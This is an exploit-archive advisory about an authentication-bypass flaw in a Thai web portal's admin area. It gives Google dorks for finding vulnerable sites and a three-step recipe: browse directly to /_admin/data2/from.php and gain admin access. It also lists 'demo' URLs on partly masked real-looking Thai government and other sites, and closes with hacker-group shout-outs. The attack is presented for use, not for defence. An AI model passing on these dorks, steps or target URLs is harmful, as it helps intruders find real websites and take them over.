Thailand portal Admin privilege escalation

2014-05-29 / 2014-05-30
Credit: alieye
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/_admin/send/img OR inurl:/_admin/data2/

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # Exploit Title: Admin privilege escalation security bug in Thailand portal # Author: alieye # Contact : cseye_ut@yahoo.com # Risk : High # Class : Remote # Google Dork: # inurl:/_admin/send/img # inurl:/_admin/data2/ # site:.th inurl:/_admin/ # # Version: all version # Tested on: win server 2008 # Date: 29/05/2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-go to the victim site like this (http://www.victim.th/_admin/) 2-change path to /_admin/data2/ or /_admin/data2/from.php 3-now ........., you are an admin (congratulation) demo : http://udonpXao.go.th/_admin/data2/from.php?id_group=&name= http://www.cXoopkpp.in.th/_admin/data2/from.php #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top